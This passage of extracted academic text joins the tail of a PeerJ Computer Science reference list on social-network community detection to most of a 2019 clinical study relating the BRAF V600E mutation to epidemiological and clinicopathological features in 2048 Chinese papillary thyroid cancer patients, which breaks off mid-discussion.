Proceedings of the 32nd international ACM SIGIR conference on research and development in information retrieval, SIGIR ’09. New York: ACM, 758–759. Ferlez J, Faloutsos C, Leskovec J, Mladenic D, Grobelnik M. 2008. Monitoring network evolution using MDL. In: Proceedings of the 2008 IEEE 24th international conference on data engineering, ICDE ’08. Piscataway: IEEE Computer Society, 1328–1330. Fortunato S. 2010. Community detection in graphs. Physics Reports 486(3–5):75–174 DOI 10.1016/j.physrep.2009.11.002. Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 31/34 https://peerj.com http://dx.doi.org/10.1098/rsta.2015.0108 http://dx.doi.org/10.1016/S0169-7552(98)00110-X http://dx.doi.org/10.1007/s13278-012-0074-8 http://dx.doi.org/10.1016/j.physrep.2009.11.002 http://dx.doi.org/10.7717/peerj-cs.107 Gauvin L, Panisson A, Cattuto C. 2014. Detecting the community structure and activity patterns of temporal networks: a non-negative tensor factorization approach. PLOS ONE 9(1):86028 DOI 10.1371/journal.pone.0086028. Giatsoglou M, Chatzakou D, Vakali A. 2013. Community detection in social media by leveraging interactions and intensities. In: Lin X, Manolopoulos Y, Srivastava D, Huang G, eds. Web information systems engineering WISE 2013. Lecture notes in computer science, vol. 8181. Berlin Heidelberg: Springer, 57–72. Giatsoglou M, Vakali A. 2013. Capturing social data evolution using graph clustering. IEEE Internet Computing 17(1):74–79. Granell C, Darst RK, Arenas A, Fortunato S, Gómez S. 2015. Benchmark model to assess community structure in evolving networks. Physical Review E 92:012805 DOI 10.1103/PhysRevE.92.012805. Greene D, Doyle D, Cunningham P. 2010. Tracking the evolution of communities in dynamic social networks. In: Memon N, Alhajj R, eds. ASONAM. Piscataway: IEEE Computer Society, 176–183. Gupta P, Goel A, Lin J, Sharma A, Wang D, Zadeh R. 2013. WTF: the who to follow service at twitter. In: Proceedings of the 22nd international conference on world wide web. Republic and Canton of Geneva: International World Wide Web Conferences Steering Committee, 505–514. Jaccard P. 1912. The distribution of the flora in the alpine zone. New Phytologist 11(2):37–50 DOI 10.1111/j.1469-8137.1912.tb05611.x. Kim Y, Shim K. 2014. TWILITE: a recommendation system for twitter using a proba- bilistic model based on latent dirichlet allocation. Information Systems 42:59–77 DOI 10.1016/j.is.2013.11.003. Konstantinidis K, Papadopoulos S, Kompatsiaris Y. 2013. Community structure and evolution analysis of osn interactions around real-world social phenomena. In: Proceedings of the 17th panhellenic conference on informatics, PCI ’13. New York: ACM, 9–16. Lancichinetti A, Fortunato S. 2009. Community detection algorithms: a comparative analysis. Physical Review E 80:056117 DOI 10.1103/PhysRevE.80.056117. Lazer D, Pentland A, Adamic L, Aral S, Barabási A-L, Brewer D, Christakis N, Contractor N, Fowler J, Gutmann M, Jebara T, King G, Macy M, Roy D, Van Alstyne M. 2009. Computational social science. Science 323(5915):721–723 DOI 10.1126/science.1167742. Leskovec J, Lang KJ, Mahoney M. 2010. Empirical comparison of algorithms for network community detection. In: Proceedings of the 19th international conference on world wide web, WWW ’10. New York: ACM, 631–640. Lin Y-R, Sundaram H, Kelliher A. 2008. Summarization of social activity over time: people, actions and concepts in dynamic networks. In: Proceedings of the 17th ACM conference on information and knowledge management, CIKM ’08. New York: ACM, 1379–1380. Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 32/34 https://peerj.com http://dx.doi.org/10.1371/journal.pone.0086028 http://dx.doi.org/10.1103/PhysRevE.92.012805 http://dx.doi.org/10.1111/j.1469-8137.1912.tb05611.x http://dx.doi.org/10.1016/j.is.2013.11.003 http://dx.doi.org/10.1103/PhysRevE.80.056117 http://dx.doi.org/10.1126/science.1167742 http://dx.doi.org/10.7717/peerj-cs.107 Lu X, Brelsford C. 2014. Network structure and community evolution on twitter: human behavior change in response to the 2011 japanese earthquake and tsunami. Scientific Reports 4:1–11. Marcus A, Bernstein M, Badar O, Karger D, Madden S, Miller R. 2011. TwitInfo: aggregating and visualizing microblogs for event exploration. In: Proceedings of the 2011 annual conference on human factors in computing systems. ACM, 227–236. McKelvey K, Rudnick A, Conover M, Menczer F. 2012. Visualizing communication on social media: making big data accessible. In: Proc. CSCW ’12 workshop on collective intelligence as community discourse and action. 46–50. Mucha PJ, Richardson T, Macon K, Porter MA, Onnela J-P. 2010. Community structure in time-dependent, multiscale, and multiplex networks. Science 328(5980):876–878 DOI 10.1126/science.1184819. Newman MEJ. 2006. Finding community structure in networks using the eigenvectors of matrices. Physical Review E 74:036104 DOI 10.1103/PhysRevE.74.036104. Nguyen NP, Dinh TN, Shen Y, Thai MT. 2014. Dynamic social community detection and its applications. PLOS ONE 9(4):1–18 DOI 10.1371/journal.pone.0091431. Nikolov D, Oliveira DFM, Flammini A, Menczer F. 2015. Measuring online social bubbles. PeerJ Computer Science 1:e38 DOI 10.7717/peerj-cs.38. Palla G, Barabasi A-L, Vicsek T. 2007. Quantifying social group evolution. Nature 446:664–667 DOI 10.1038/nature05670. Papadopoulos S, Kompatsiaris Y, Vakali A, Spyridonos P. 2012. Community detection in social media–performance and application considerations. Data Mining Knowl- edge Discovery 24(3):515–554 DOI 10.1007/s10618-011-0224-z. Qu Q, Liu S, Jensen CS, Zhu F, Faloutsos C. 2014. Interestingness-driven diffusion process summarization in dynamic networks. In: Calders T, Esposito F, Hüllermeier E, Meo R, eds. Machine Learning and Knowledge Discovery in Databases: European Conference, ECML PKDD 2014, Nancy, France, September 15–19, 2014. Proceedings, Part II, chapter 38. Berlin, Heidelberg: Springer Berlin Heidelberg, 597–613. Rea MC. 1995. The problem of material constitution. Philosophical Review 104(4) 525–552 DOI 10.2307/2185816. Rosvall M, Axelsson D, Bergstrom CT. 2009. The map equation. The European Physical Journal Special Topics 178(1):13–23 DOI 10.1140/epjst/e2010-01179-1. Rosvall M, Bergstrom CT. 2008. Maps of random walks on complex networks reveal community structure. Proceedings of the National Academy of Sciences of the United States of America 105(4):1118–1123 DOI 10.1073/pnas.0706851105. Roy Chowdhury N, Sukumar S. 2014. Persistence based analysis of consensus protocols for dynamic graph networks. In: Control Conference (ECC), 2014 European. 886–891. Schinas M, Papadopoulos S, Kompatsiaris Y, Mitkas PA. 2015. Visual event summariza- tion on social media using topic modelling and graph-based ranking algorithms. In: Proceedings of the 5th ACM on international conference on multimedia retrieval. New York: ACM, 203–210. Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 33/34 https://peerj.com http://dx.doi.org/10.1126/science.1184819 http://dx.doi.org/10.1103/PhysRevE.74.036104 http://dx.doi.org/10.1371/journal.pone.0091431 http://dx.doi.org/10.7717/peerj-cs.38 http://dx.doi.org/10.1038/nature05670 http://dx.doi.org/10.1007/s10618-011-0224-z http://dx.doi.org/10.2307/2185816 http://dx.doi.org/10.1140/epjst/e2010-01179-1 http://dx.doi.org/10.1073/pnas.0706851105 http://dx.doi.org/10.7717/peerj-cs.107 Sørensen T. 1948. A method of establishing groups of equal amplitude in plant sociology based on similarity of species and its application to analyses of the vegetation on Danish commons. Biologiske Skrifter 5:1–34. Takaffoli M, Sangi F, Fagnan J, Zaïane OR. 2011. Community evolution mining in dynamic social networks. Procedia—Social and Behavioral Sciences 22(0):49–58 DOI 10.1016/j.sbspro.2011.07.055. Tantipathananandh C, Berger-Wolf T, Kempe D. 2007. A framework for community identification in dynamic social networks. In: Proceedings of the 13th ACM SIGKDD international conference on Knowledge discovery and data mining, KDD ’07. New York: ACM, 717–726. Topirceanu A, Udrescu M, Vladutiu M, Marculescu R. 2016. Tolerance-based inter- action: a new model targeting opinion formation and diffusion in social networks. PeerJ Computer Science 2:e42 DOI 10.7717/peerj-cs.42. Volkovs MN, Larochelle H, Zemel RS. 2012. Learning to rank by aggregating expert preferences. In: Proceedings of the 21st ACM international conference on information and knowledge management, CIKM ’12. New York: ACM, 843–851. Wei W, Joseph K, Liu H, Carley KM. 2015. The fragility of twitter social networks against suspended users. In: Proceedings of the 2015 IEEE/ACM international conference on advances in social networks analysis and mining 2015, ASONAM ’15. New York: ACM, 9–16. Williams SA, Terras MM, Warwick C. 2013. What do people study when they study twitter? Classifying twitter related academic papers. Journal of Documentation 69(3):384–410 DOI 10.1108/JD-03-2012-0027. Xiao D, Du N, Wu B, Wang B. 2007. Community ranking in social network. Computer and Computational Sciences, International Multi-Symposiums on 0:322–329. Yang J, McAuley JJ, Leskovec J. 2013. Community detection in networks with node attributes. In: 2013 IEEE 13th international conference on data mining, Dallas, TX, USA, December 7–10, 2013. Piscataway: IEEE, 1151–1156. Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 34/34 https://peerj.com http://dx.doi.org/10.1016/j.sbspro.2011.07.055 http://dx.doi.org/10.7717/peerj-cs.42 http://dx.doi.org/10.1108/JD-03-2012-0027 http://dx.doi.org/10.7717/peerj-cs.107 work_eb3v35mzffhfldcyuvzyhi467q ---- 8:7 988–996C Yan, M Huang et al. BRAF V600E mutation in PTC RESEARCH Relationship between BRAF V600E and clinical features in papillary thyroid carcinoma Changjiao Yan*, Meiling Huang*, Xin Li, Ting Wang and Rui Ling Department of Thyroid, Breast and Vascular Surgery, Xijing Hospital, Fourth Military Medical University, Xi’an, Shaanxi, China Correspondence should be addressed to R Ling or T Wang: lingruiaoxue@126.com or ting_w100@126.com *(C Yan and M Huang contributed equally to this work) Abstract Objective: To investigate the mutant status of BRAF gene and analyze its relationship to epidemiological risk factors and clinical outcomes among patients with papillary thyroid cancer (PTC) in the largest, single-institution Chinese cohort to date. Methods: The medical records of 2048 PTC patients were reviewed in this retrospective study. Single-factor and multiple logistic regression analyses were applied to identify risk factors for BRAF V600E mutation. Survival outcomes including distant metastatic and persistent or recurrent PTC were examined, with a mean follow-up time of 23.4 (5–47) months. Results: The BRAF V600E mutation was present in 83.7% of patients (1715 of 2048). Correlation was found between BRAF V600E mutation and several epidemiological features, including age, concomitant hypertension and Hashimoto thyroiditis (HT). For the clinicopathological features, BRAF V600E was significantly associated with bilateral multifocality (odds ratio (OR) 1.233, 95% confidence interval (CI) 1.063–1.431, P < 0.01) and less lateral lymph node metastases (OR 0.496, 95% CI 0.357–0.689, P < 0.01). Smaller tumor size and advanced disease stage were significant in single-factor analyses but became insignificant after multivariate adjustment. No association was found between BRAF V600E mutation and extrathyroidal invasion, distant metastatic and disease persistence or recurrence. Conclusion: Part of epidemiological features are independent risk or protective factors for BRAF V600E mutation. The presence of BRAF V600E mutation is not an aggressive prognosis on poor clinical outcomes in PTC. However, the high prevalence of BRAF V600E may provide guidance for surgery strategy and opportunity for targeted treatment in recurrent and advanced stage disease. Introduction Thyroid cancer, especially papillary subtype, is the most common malignancy in the endocrine system (1). Papillary thyroid cancer (PTC) can be further classified into conventional variant (CPTC), follicular variant (FVPTC) and other rare variants (2). Despite PTC is usually a well-differentiated thyroid carcinoma with a favorable prognosis, its incidence has been sharply rising in many countries over the last decades (3) (the average incidence in the USA was 2.4% from 1980 to 1997 and 6.6% from 1997 to 2009 (2)). In addition, recurrence and metastases are common for a small proportion of PTCs who reach advanced disease stages (4). In recent years, molecular markers have received extensive attention to improving risk stratification of PTC (5). BRAF is the main subtype of RAF kinase and plays a key role in tumorigenesis. The mutation of BRAF V600E -19-0246 Key Words f papillary thyroid cancer f BRAF V600E f epidemiological features f clinicopathological features Endocrine Connections (2019) 8, 988–996 ID: 19-0246 8 7 This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0246 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:26PM via free access mailto:lingruiaoxue@126.com mailto:ting_w100@126.com https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0246 https://ec.bioscientifica.com C Yan, M Huang et al. BRAF V600E mutation in PTC 989 PB–9 8:7 could trigger tumorigenesis through constitutively activating MAPK pathway (6). As the most common mutation observed in PTC, BRAF V600E has received special attention in various ethnic populations since this protein kinase may contribute to cell proliferation, growth and division. However, due to the limited large cohort evidence, the function of BRAF V600E as a biomarker in driving aggressiveness in PTC continues debatable (7, 8). The majority of researches claimed that BRAF V600E mutation was associated with poor clinicopathologic outcomes in patients with PTC, such as large tumor size, lymph node metastases, advanced clinical stages and recurrence (9, 10). By contrast, several studies suggested that BRAF V600E mutation had no significant association with clinical stage, multicentricity or recurrence (11, 12). These equivocal findings have hindered the fact that whether the mutation had an impact on aggressive behavior of PTC. Furthermore, most researches have focused on the relationship between mutation and clinicopathological characteristics, but the epidemiologic factors related to BRAF V600E mutations were rarely studied in previous researches. Here, we investigated epidemiological characteristics that may be associated with the mutation of BRAF V600E and then studied the role of BRAF V600E mutation in the clinicopathological features of PTC. Patients and methods Patient identification and clinicopathologic data collection This study included 2048 patients (1556 women and 492 men) age 43.14 ± 11.01 years (mean ± s.d.) who were diagnosed with PTC and underwent surgery between January 2015 and July 2018 at the Department of the thyroid, breast and vascular surgery in Xijing Hospital. These patients were clinically observed with mean follow-up time of 23.4 months (range 5–47 months) after the initial treatments. All these patients were regularly followed with physical examinations, thyroid function tests and neck ultrasonography every 6–12 months after the initial surgery. If suspicious or indeterminate thyroid nodules or lymph nodes were found, ultrasound-guided fine-needle aspiration cytology (US-FNAC) was used for evaluation. Between January 2015 and July 2018, 2850 patients were diagnosed with thyroid cancer. Among these, 2805 patients (98.42%) were diagnosed with PTC, and 45 patients (1.58%) were diagnosed with other types of thyroid carcinoma. PTC patients without BRAF V600E status or lost to follow-up were excluded. The flow diagram of patient included was shown in Fig. 1. After institutional review board approval and informed patient consenting, we retrospectively collected detailed BRAF V600E and clinicopathologic data from institutional patient records. The epidemiological data and clinicopathological features were summarized in Tables 1 and 2, respectively. Patients with alcohol history was defined as patients who drinking more than twice a month and lasting more than 1 year. Patients with smoking history was defined as patients who had a current or past smoking history of ≥6 months. Tumor node metastasis (TNM) stages were defined based on the seventh edition of the American Joint Committee on Cancer (AJCC) staging system. Persistent or recurrent disease was defined as the presence of a structural abnormality confirmed by cytological or surgical pathology after the initial surgery. The BRAF V600E mutation results had no influence on the treatment decision making. Figure 1 Flow diagram of patient included according to the inclusion and exclusion criteria. 2850 patients diagnosed with thyroid carcinoma 45 excluded 25 follicular thyroid cancer 16 medullary thyroid cancer 4 anaplastic thyroid cancer2805 papillary thyroid carcinoma 757 excluded 343 was short of BRAF V600E mutational results 403 was lost follow-up care 11 not providing complete epidemiological and clinicopathological features 2048 patients were included in this study This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0246 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:26PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0246 https://ec.bioscientifica.com C Yan, M Huang et al. BRAF V600E mutation in PTC 9908:7 Mutational analyses BRAF V600E mutational analyses were performed by pathologists after surgical treatments of patients. DNA was isolated from formalin-fixed, paraffin-embedded (FFPE) tissue blocks by SDS-proteinase K method and subjected to Amplification Refractory Mutation System (ARMS)- real-time PCR for the detection of BRAF V600E mutations. DNA was extracted from each sample via a commercial kit (FFPE DNA reagent, Cat No. ADx-FF01) according to the manufacturer’s instructions. Typically, 5 μm sections (2–4 pieces) were carefully micro-dissected from FFPE tissue blocks. The sections were initially treated with 1.5 mL xylene/ethanol three times, then digested during an overnight incubation with 20 μL proteinase K solution and 180 μL buffer DTL in a 56°C rotating incubator, and DNA purification was performed through QIAgen columns, according to the manufacturer’s instructions. Then, the most common T1799A transversion (BRAF V600E) mutation was studied. The PCR was used to amplify exon 15 of the BRAF gene, which was detected by BRAF V600 Mutations Detection Kit (Applied by ADx-BR01, AmoyDx Company, China) according to the manufacturer’s instructions. PCR primer sequences were as follows: Table 1 Association of BRAF V600E with epidemiologic features of all PTC. BRAF V600E mutation (−) BRAF V600E mutation (+) χ2 P valueNo. (%) No. (%) Total No. of cases 333 (16.3) 1715 (83.7) Age at diagnosis ≤45 224 (20.3) 881 (79.7) 28.366 <0.001 >45 109 (11.6) 834 (88.4) Sex Male 74 (15.0) 418 (85.0) 0.707 0.400 Female 259 (16.6) 1297 (83.4) Family history of cancer Had any family member(s) with history of cancer 27 (11.4) 209 (88.6) 4.550 0.033 None 306 (22.5) 1506 (77.5) Presence of history of cancer Had any other cancer 5 (12.5) 35 (87.5) 0.424 0.515 None 328 (16.3) 1680 (83.7) Presence of smoking history Ever 28 (18.1) 127 (81.9) 0.401 0.527 Never 305 (16.1) 1588 (83.9) Presence of alcohol history Ever 7 (15.2) 39 (84.8) 0.038 0.846 Never 326 (16.3) 1676 (83.7) Concomitant diabetes Yes 8 (8.6) 85 (91.4) 4.196 0.041 No 325 (16.6) 1630 (83.4) Concomitant hypertension Yes 18 (7.0) 238 (93.0) 18.300 <0.001 No 315 (17.6) 1477 (82.4) Concomitant benign thyroid diseases Hyperthyroid Yes 7 (24.1) 22 (75.9) / 0.305 No 326 (16.1) 1693 (83.9) Nodular goiter Yes 19 (20.4) 74 (79.6) 1.244 0.265 No 314 (16.1) 1641 (83.9) HT Yes 96 (28.9) 236 (71.1) 46.611 <0.001 No 237 (13.8) 1479 (86.2) The chi-square test (χ2 test) or, for small cell sizes, Fisher’s exact test was employed to examine the significance of association between BRAF V600E and epidemiologic features. P value <0.05 was treated as statistically significant. Bold indicates statistical significance. ‘/’ means no χ2 value because cell sizes were small and Fisher’s exact test was employed. ‘%’ is the proportion of patients with or without BRAF V600E mutations in the subgroup of patients. HT, Hashimoto thyroiditis. This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0246 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:26PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0246 https://ec.bioscientifica.com C Yan, M Huang et al. BRAF V600E mutation in PTC 991 PB–9 8:7 forward primer, TCTGTAGCAGCCCTCAGTAGCGAAGCA GTGATTTTGGTCTAGCTACAGA; reverse primer, AGC CCTCAGTAGCGAAGCAACTCAGCAGCATCTCAGG. BRAF gene reactions were performed in a final volume of 40 μL using as template 10–15 ng of genomic DNA, with 1× buffer including 14 pmol forward primer, 20 pmol reverse primer, 12.5 pmol dNTPs, 350 pmol MgCl2, mutant probe 20 pmol and 1 unit of Taq polymerase. Each reaction included a positive and a negative control sample, and in negative sample, DNA template was substituted by water. PCR recycling started with initial denaturation step at 95°C for 5 min, followed by 40 cycles of denaturation (95°C, 25 s), annealing (64°C, 20 s) and extension (72°C, 20 s) and a last step of 10 min extension at 72°C. PCR efficiency was determined by measuring the Ct value of FAM signal. Table 2 Relationship of BRAF V600E with clinicopathological features of All PTC. BRAF V600E mutation (−) BRAF V600E mutation (+) χ2 P valueNo. (%) No. (%) Total no. of cases 333 (16.3) 1715 (83.7) Surgery Lobectomy 53 (14.8) 306 (85.2) 0.716 0.397 Total thyroidectomy 280 (16.6) 1409 (83.4) Histological type CPTC 321 (15.9) 1701 (84.1) / <0.001 FVPTC 12 (46.2) 14 (53.8) Tumor size ≤2 cm 290 (15.6) 1564 (84.4) 5.488 0.019 >2 cm 43 (22.2) 151 (77.8) Median (quartile), cm 1.0 (0.7–1.5) 0.9 (0.7–1.4) Lesions Unilateral 260 (18.0) 1184 (82.0) 10.959 0.001 Bilateral 73 (12.1) 531 (87.9) Extrathyroidal invasion Yes 45 (15.6) 244 (84.4) 0.117 0.732 No 288 (16.4) 1471 (83.6) Vascular invasion Yes 43 (15.4) 237 (84.6) 0.194 0.660 No 290 (16.4) 1478 (83.6) Status of lymph node metastasesa Yes 190 (18.2) 855 (81.8) 3.704 0.054 No 127 (14.9) 727 (85.1) Site of lymph node metastases Only central 92 (14.0) 564 (86.0) 20.648 <0.001 Only lateral 13 (23.2) 43 (76.8) Central and lateral 85 (25.5) 248 (74.5) Disease stage (7th edition)b I + II 282 (17.8) 1301 (82.2) 6.718 0.010 III + IV 48 (12.3) 341 (87.7) Distant metastatic Yes 1 (20.0) 4 (80.0) / 1.000 No 332 (16.3) 1711 (83.7) Persistent or recurrent disease Yes 19 (22.1) 67 (77.9) 2.243 0.134 No 314 (16.0) 1648 (84.0) The chi-square test (χ2 test) or, for small cell sizes, Fisher’s exact test was employed to examine the significance of association between BRAF V600E and clinicopathological features. P value <0.05 was treated as statistically significant. Bold indicates statistical significance. Tumor size was summarized with medians (quartile). ‘/’means no χ2 value because cell sizes were small and Fisher’s exact test was employed. ‘%’ is the proportion of patients with or without BRAF V600E mutations in the subgroup of patients. ‘a’ means there are missing cases in ‘Status of lymph node metastases’. In patients without BRAF V600E mutations, 16 patients had undetermined lymph node metastasis status. In patients with BRAF V600E mutations, 133 patients had undetermined lymph node metastasis status. ‘b’ means there are missing cases in ‘Disease stage’. In patients without BRAF V600E mutations, the disease stage of three patients cannot be determined. In patients with BRAF V600E mutations, the disease stage of 73 patients cannot be determined. CPTC, conventional papillary thyroid carcinoma; FVPTC, follicular variant papillary thyroid carcinoma. This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0246 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:26PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0246 https://ec.bioscientifica.com C Yan, M Huang et al. BRAF V600E mutation in PTC 9928:7 Statistical analyses Data related to histologic characteristics, patient epidemiological data and clinical outcomes were collected. Categorical data were summarized with frequencies and percentages. Continuous data were summarized with means ± standard deviations (if it is a normal distribution) or medians and quartile (if it is not a normal distribution). The chi-square test (χ2 test) or, for small cell sizes, Fisher’s exact test was employed to examine categorical variables. All P values were two-sided, and a P value <0.05 was treated as statistically significant. Pooled ORs with their corresponding 95% confidence intervals (95% CIs) were calculated to assess the relationship between BRAF V600E mutation and clinicopathological features. All statistical analyses were conducted by the software of SPSS with version 23.0. Results BRAF V600E mutation in PTC There were 2048 patients included in the study with an average age of 43.14 ± 11.01 (range 5–80), and 76.0% of the patients were female (1556 women and 492 men). BRAF V600E mutation was found in 1701 of 2022 (84.1%) CPTCs, and 14 of 26 (53.8%) FVPTCs, with an overall prevalence of 83.7% (1715 of 2048). No significant difference of BRAF V600E mutation was observed in female and male patients (P = 0.400). With regard to ages, significant difference of BRAF V600E incidence was found between patients aged ≤45 and >45 years (79.7 vs 88.4%, P < 0.001). To further investigate the influence of age on mutational incidence, we divided all patients into children/adolescent group (≤25 years) and adults groups of various age ranges (25–35, 35–45, 45–55, >55 years old). As shown in Fig. 2, patients were more prone to be BRAF V600E positive with the growth of age. Association of BRAF V600E and epidemiological features in PTCs To identify epidemiological factors associated with BRAF V600E mutation, the relationship between epidemiological features and the mutation was investigated. In the univariate analysis of 2048 PTCs (Table 1), the presence of BRAF V600E mutation was found to be significantly associated with several epidemiological features, including age at diagnosis, family history of cancer, concomitant diabetes, hypertension and Hashimoto thyroiditis (HT). The incidence of BRAF V600E mutations in patients with family cancer history was higher than that in patients without family history of cancer (88.6 vs 77.5%, P = 0.033). Interestingly, patients with diabetes or hypertension presented higher mutation rates than those who did not have diabetes or hypertension (91.4 vs 83.4%, P = 0.041; 93.0 vs 82.4%, P < 0.001). Conversely, the patients concomitant of HT displayed less BRAF V600E mutations than patients without HT (71.1 vs 86.2%, P < 0.001). Similarly, patients with hyperthyroid or nodular goiter showed lower mutation frequency than those who did not have hyperthyroid or nodular goiter, but the association was insignificant. Except the factors mentioned above, no significant association was found between the presence of BRAF V600E mutation and other features including gender, presence of history of cancer, presence of smoking and alcohol history. Relationship of BRAF V600E and clinicopathological features in PTCs In the univariate analysis of all PTCs (Table 2), the presence of BRAF V600E was found to be significantly associated with small tumor size (P = 0.019), bilateral multifocality (P = 0.001), less central and lateral lymph node metastases simultaneously (P < 0.001) and advanced disease stage (III and IV) (P = 0.010). Although there was no significant association, less BRAF V600E mutation was found in patients with lymph node metastases than patients without lymph node metastases (81.8 vs 85.1%, P = 0.054). Furthermore, it was worth noticing that less BRAF V600E presented in patients with aggressive lymph node metastases (central and lateral metastases at the same time) than patients with only central or only lateral lymph node metastases (74.5 vs 86.0% or 76.8%, P < 0.001). No significant association was found between BRAF 0.0% 20.0% 40.0% 60.0% 80.0% 100.0% ≤25 25-35 35-45 45-55 55 BRAF V600E (+) BRAF V600E (-) Figure 2 The correlation between the presence of the BRAF V600E mutation and the age of patients at the time of diagnosis. This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0246 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:26PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0246 https://ec.bioscientifica.com C Yan, M Huang et al. BRAF V600E mutation in PTC 993 PB–9 8:7 V600E mutation and another high-risk clinicopathologic characteristics, such as extrathyroidal invasion (P = 0.732), vascular invasion (P = 0.660), distant metastatic (P = 1.000) and PTC persistence or recurrence (P = 0.134). Multivariate logistic regression analysis of BRAF V600E mutation in PTCs To further confirm the relationship between BRAF V600E and epidemiological or clinicopathological features, multivariate logistic regression analysis was performed (Table 3). The results showed that age (P = 0.002, OR = 1.024, 95% CI = 1.009–1.041), concomitant hypertension (P = 0.032, OR = 1.812, 95% CI = 1.052–3.120) and lesions (P = 0.006, OR = 1.233, 95% CI = 1.063–1.431) were positive independent factors for BRAF V600E mutation. In contrast, concomitant HT (P < 0.001, OR = 0.402, 95% CI = 0.300–0.538) and lateral lymph node metastases (P < 0.001, OR = 0.496, 95% CI = 0.357–0.689) were negative independent factors for BRAF V600E mutation. After adjustment for patients’ age and sex, the association between BRAF V600E mutation and disease stage was not statistically significant (P = 0.771, OR = 1.028, 95% CI = 0.856–1.234). Discussion This study sought to find the epidemiological factors associated with BRAF V600E mutation and clarify the relationship between BRAF V600E mutation and clinical outcomes in PTC. Previously, the BRAF V600E mutation has been reported as an aggressive prognosis in PTC, although a large cohort study was inadequate and there have been noteworthy inconsistencies in some studies (13, 14). In our analysis, we found a lack of Table 3 Multivariate logistic regression analysis of BRAF V600E mutation of all PTC. BRAF V600E mutation (n, %) P Value OR 95% CI− + Age at diagnosis 39.29 ± 11.44 43.88 ± 10.77 0.002 1.024 1.009–1.041 Sex 0.750 1.051 0.773–1.431 Male 74 (15.0%) 418 (85.0%) Female 259 (16.6%) 1297 (83.4%) Family history of cancer 0.195 1.352 0.857–2.131 Had any family member(s) with history of cancer 27 (11.4%) 209 (88.6%) None 306 (22.5%) 1506 (77.5%) Concomitant diabetes 0.428 1.389 0.616–3.129 Yes 8 (8.6%) 85 (91.4%) No 325 (16.6%) 1630 (83.4%) Concomitant hypertension 0.032 1.812 1.052–3.120 Yes 18 (7.0%) 238 (93.0%) No 315 (17.6%) 1477 (82.4%) Concomitant HT <0.001 0.402 0.300–0.538 Yes 96 (28.9%) 236 (71.1%) No 237 (13.8%) 1479 (86.2%) Tumor size 1.0 (0.7–1.5) 0.9 (0.7–1.4) 0.571 0.950 0.795–1.135 Lesions 0.006 1.233 1.063–1.431 Unilateral 260 (18.0%) 1184 (82.0%) Bilateral 73 (12.1%) 531 (87.9%) Site of lymph node metastasis Central 177 (17.9%) 811 (82.1%) 0.346 1.157 0.854–1.568 Lateral 98 (25.2%) 290 (74.8%) <0.001 0.496 0.357–0.689 Disease stage (7th edition)a 0.771 1.028 0.856–1.234 I + II 282 (17.8%) 1301 (82.2%) III + IV 48 (12.3%) 341 (87.7%) Age at diagnosis was summarized with means ± standard deviations. Tumor size was summarized with medians (quartile). Multivariate logistic regression analysis was employed to identify risk factors for BRAF V600E mutations. P value <0.05 was treated as statistically significant. Bold indicates statistical significance. ‘%’ is the proportion of patients with or without BRAF V600E mutations in the subgroup of patients. ‘a’ means there are missing cases in ‘Disease stage’. In patients without BRAF V600E mutations, the disease stage of three patients cannot be determined. In patients with BRAF V600E mutations, the disease stage of 73 patients cannot be determined. HT, Hashimoto thyroiditis; OR, odds ratio; 95% CI, 95% confidence interval. This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0246 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:26PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0246 https://ec.bioscientifica.com C Yan, M Huang et al. BRAF V600E mutation in PTC 9948:7 correlation between BRAF V600E mutation and either aggressive clinicopathological features or persistent or recurrent disease. The incidence of BRAF V600E mutation increased in recent years, it seems that BRAF V600E mutation gradually become the accompanying phenomenon for PTC patients. Mingzhao Xing et al. reported BRAF V600E rate of 38.3% in patients between 1990 and 2012 (15). In 2007, Electron et al. reported the prevalence of BRAF V600E was 46.4% (16). In 2012, Kurtulmus et al. showed BRAF V600E mutation 